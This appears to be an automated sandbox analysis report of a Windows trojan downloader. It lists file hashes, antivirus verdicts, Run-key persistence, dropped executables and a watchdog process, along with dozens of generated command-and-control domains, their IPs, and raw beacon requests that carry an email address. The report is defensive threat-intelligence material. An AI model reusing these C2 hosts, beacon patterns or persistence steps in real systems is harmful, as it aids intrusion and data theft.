Analysis Date2015-08-26 11:56:33
MD53a48d170aa9b052576f55450ae43ea37
SHA17262631f5471a12db1d8f3138c8472ea9f721a8a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 7e6c27edd68b8634baf304670b768d9c sha1: cbcefe362ac09da2a8713b251cca93b55d8e24b5 size: 293888
Section.rdata md5: 0ec406188b1733505b49fbcf66d97d5f sha1: 1cc0a16b071643f150da0a794b0fa643a1db947c size: 31744
Section.data md5: 6986a6664ec9db95c4c38f4b4cb2b59a sha1: 08a9ed242686d5a884dbbe804bda478e22d5db77 size: 92160
Timestamp2014-10-30 10:30:05
PackerMicrosoft Visual C++ ?.?
PEhashf0ea00ab142a4cdabec7c332a670d2f352454ca5
IMPhash5b1c023aaa38adc27bd5ab3c0aa67264
AVCA (E-Trust Ino)no_virus
AVF-SecureGen:Variant.Symmi.22722
AVDr. WebTrojan.DownLoader13.47941
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVBullGuardGen:Variant.Symmi.22722
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)Trojan.Dynamer.AC3
AVTrend MicroTROJ_FORUCON.BMC
AVKasperskyTrojan.Win32.Generic
AVZillya!no_virus
AVEmsisoftGen:Variant.Symmi.22722
AVIkarusTrojan.FBAccountLock
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVMalwareBytesTrojan.Zbot.WHE
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVK7Trojan ( 004cb2771 )
AVBitDefenderGen:Variant.Symmi.22722
AVFortinetW32/Kryptik.DDQD!tr
AVSymantecDownloader.Upatre!g15
AVGrisoft (avg)Win32/Cryptor
AVEset (nod32)Win32/Agent.VNC
AVAlwil (avast)Downloader-TLD [Trj]
AVAd-AwareGen:Variant.Symmi.22722
AVTwisterno_virus
AVAvira (antivir)BDS/Zegost.Gen4
AVMcafeeTrojan-FEMT!3A48D170AA9B
AVRisingno_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Ordering Office Registrar Propagation Control ➝
C:\Documents and Settings\Administrator\Application Data\vuldhopwpshdf\onjncehyo.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\vuldhopwpshdf\onjncehyo.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\vuldhopwpshdf\onjncehyo.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\vuldhopwpshdf\onjncehyo.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\vuldhopwpshdf\onjncehyo.gra
Creates FileC:\Documents and Settings\Administrator\Application Data\vuldhopwpshdf\bfvvkpafx.exe
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\vuldhopwpshdf\onjncehyo.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\vuldhopwpshdf\onjncehyo.exe"

Network Details:

DNSlaughschool.net
Type: A
184.168.221.69
DNSsimpleschool.net
Type: A
216.250.126.173
DNSmotherschool.net
Type: A
184.168.221.19
DNSmountainschool.net
Type: A
184.168.221.15
DNSwindowwhile.net
Type: A
95.211.230.75
DNSwinterschool.net
Type: A
82.98.134.9
DNSfinishschool.net
Type: A
208.73.211.70
DNSmaterialanger.net
Type: A
DNSseveralalways.net
Type: A
DNSmaterialalways.net
Type: A
DNSseveralforest.net
Type: A
DNSmaterialforest.net
Type: A
DNSseveraschool.net
Type: A
DNSseverawhile.net
Type: A
DNSlaughwhile.net
Type: A
DNSseveraquestion.net
Type: A
DNSlaughquestion.net
Type: A
DNSseveratherefore.net
Type: A
DNSlaughtherefore.net
Type: A
DNSsimplewhile.net
Type: A
DNSmotherwhile.net
Type: A
DNSsimplequestion.net
Type: A
DNSmotherquestion.net
Type: A
DNSsimpletherefore.net
Type: A
DNSmothertherefore.net
Type: A
DNSpossibleschool.net
Type: A
DNSmountainwhile.net
Type: A
DNSpossiblewhile.net
Type: A
DNSmountainquestion.net
Type: A
DNSpossiblequestion.net
Type: A
DNSmountaintherefore.net
Type: A
DNSpossibletherefore.net
Type: A
DNSperhapsschool.net
Type: A
DNSwindowschool.net
Type: A
DNSperhapswhile.net
Type: A
DNSperhapsquestion.net
Type: A
DNSwindowquestion.net
Type: A
DNSperhapstherefore.net
Type: A
DNSwindowtherefore.net
Type: A
DNSsubjectschool.net
Type: A
DNSwinterwhile.net
Type: A
DNSsubjectwhile.net
Type: A
DNSwinterquestion.net
Type: A
DNSsubjectquestion.net
Type: A
DNSwintertherefore.net
Type: A
DNSsubjecttherefore.net
Type: A
DNSleaveschool.net
Type: A
DNSfinishwhile.net
Type: A
DNSleavewhile.net
Type: A
DNSfinishquestion.net
Type: A
DNSleavequestion.net
Type: A
DNSfinishtherefore.net
Type: A
DNSleavetherefore.net
Type: A
DNSsweetschool.net
Type: A
DNSprobablyschool.net
Type: A
DNSsweetwhile.net
Type: A
DNSprobablywhile.net
Type: A
DNSsweetquestion.net
Type: A
DNSprobablyquestion.net
Type: A
DNSsweettherefore.net
Type: A
DNSprobablytherefore.net
Type: A
DNSseveralschool.net
Type: A
DNSmaterialschool.net
Type: A
DNSseveralwhile.net
Type: A
DNSmaterialwhile.net
Type: A
DNSseveralquestion.net
Type: A
DNSmaterialquestion.net
Type: A
DNSseveraltherefore.net
Type: A
DNSmaterialtherefore.net
Type: A
DNSseverahunger.net
Type: A
DNSlaughhunger.net
Type: A
DNSseveratraining.net
Type: A
DNSlaughtraining.net
Type: A
DNSseverastorm.net
Type: A
DNSlaughstorm.net
Type: A
DNSseverathrown.net
Type: A
DNSlaughthrown.net
Type: A
DNSsimplehunger.net
Type: A
DNSmotherhunger.net
Type: A
DNSsimpletraining.net
Type: A
DNSmothertraining.net
Type: A
DNSsimplestorm.net
Type: A
DNSmotherstorm.net
Type: A
DNSsimplethrown.net
Type: A
DNSmotherthrown.net
Type: A
HTTP GEThttp://laughschool.net/index.php?email=technicolor.hotel.rfp@aexp.com&method=post&len
User-Agent:
HTTP GEThttp://simpleschool.net/index.php?email=technicolor.hotel.rfp@aexp.com&method=post&len
User-Agent:
HTTP GEThttp://motherschool.net/index.php?email=technicolor.hotel.rfp@aexp.com&method=post&len
User-Agent:
HTTP GEThttp://mountainschool.net/index.php?email=technicolor.hotel.rfp@aexp.com&method=post&len
User-Agent:
HTTP GEThttp://windowwhile.net/index.php?email=technicolor.hotel.rfp@aexp.com&method=post&len
User-Agent:
HTTP GEThttp://winterschool.net/index.php?email=technicolor.hotel.rfp@aexp.com&method=post&len
User-Agent:
HTTP GEThttp://finishschool.net/index.php?email=technicolor.hotel.rfp@aexp.com&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 184.168.221.69:80
Flows TCP192.168.1.1:1032 ➝ 216.250.126.173:80
Flows TCP192.168.1.1:1033 ➝ 184.168.221.19:80
Flows TCP192.168.1.1:1034 ➝ 184.168.221.15:80
Flows TCP192.168.1.1:1035 ➝ 95.211.230.75:80
Flows TCP192.168.1.1:1036 ➝ 82.98.134.9:80
Flows TCP192.168.1.1:1037 ➝ 208.73.211.70:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746563 686e6963 6f6c6f72   mail=technicolor
0x00000020 (00032)   2e686f74 656c2e72 66704061 6578702e   .hotel.rfp@aexp.
0x00000030 (00048)   636f6d26 6d657468 6f643d70 6f737426   com&method=post&
0x00000040 (00064)   6c656e20 48545450 2f312e30 0d0a4163   len HTTP/1.0..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 6c617567 68736368 6f6f6c2e   st: laughschool.
0x00000080 (00128)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746563 686e6963 6f6c6f72   mail=technicolor
0x00000020 (00032)   2e686f74 656c2e72 66704061 6578702e   .hotel.rfp@aexp.
0x00000030 (00048)   636f6d26 6d657468 6f643d70 6f737426   com&method=post&
0x00000040 (00064)   6c656e20 48545450 2f312e30 0d0a4163   len HTTP/1.0..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 73696d70 6c657363 686f6f6c   st: simpleschool
0x00000080 (00128)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746563 686e6963 6f6c6f72   mail=technicolor
0x00000020 (00032)   2e686f74 656c2e72 66704061 6578702e   .hotel.rfp@aexp.
0x00000030 (00048)   636f6d26 6d657468 6f643d70 6f737426   com&method=post&
0x00000040 (00064)   6c656e20 48545450 2f312e30 0d0a4163   len HTTP/1.0..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 6d6f7468 65727363 686f6f6c   st: motherschool
0x00000080 (00128)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746563 686e6963 6f6c6f72   mail=technicolor
0x00000020 (00032)   2e686f74 656c2e72 66704061 6578702e   .hotel.rfp@aexp.
0x00000030 (00048)   636f6d26 6d657468 6f643d70 6f737426   com&method=post&
0x00000040 (00064)   6c656e20 48545450 2f312e30 0d0a4163   len HTTP/1.0..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 6d6f756e 7461696e 7363686f   st: mountainscho
0x00000080 (00128)   6f6c2e6e 65740d0a 0d0a                ol.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746563 686e6963 6f6c6f72   mail=technicolor
0x00000020 (00032)   2e686f74 656c2e72 66704061 6578702e   .hotel.rfp@aexp.
0x00000030 (00048)   636f6d26 6d657468 6f643d70 6f737426   com&method=post&
0x00000040 (00064)   6c656e20 48545450 2f312e30 0d0a4163   len HTTP/1.0..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 77696e64 6f777768 696c652e   st: windowwhile.
0x00000080 (00128)   6e65740d 0a0d0a0a 0d0a                net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746563 686e6963 6f6c6f72   mail=technicolor
0x00000020 (00032)   2e686f74 656c2e72 66704061 6578702e   .hotel.rfp@aexp.
0x00000030 (00048)   636f6d26 6d657468 6f643d70 6f737426   com&method=post&
0x00000040 (00064)   6c656e20 48545450 2f312e30 0d0a4163   len HTTP/1.0..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 77696e74 65727363 686f6f6c   st: winterschool
0x00000080 (00128)   2e6e6574 0d0a0d0a 0d0a                .net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746563 686e6963 6f6c6f72   mail=technicolor
0x00000020 (00032)   2e686f74 656c2e72 66704061 6578702e   .hotel.rfp@aexp.
0x00000030 (00048)   636f6d26 6d657468 6f643d70 6f737426   com&method=post&
0x00000040 (00064)   6c656e20 48545450 2f312e30 0d0a4163   len HTTP/1.0..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 66696e69 73687363 686f6f6c   st: finishschool
0x00000080 (00128)   2e6e6574 0d0a0d0a 0d0a                .net......


Strings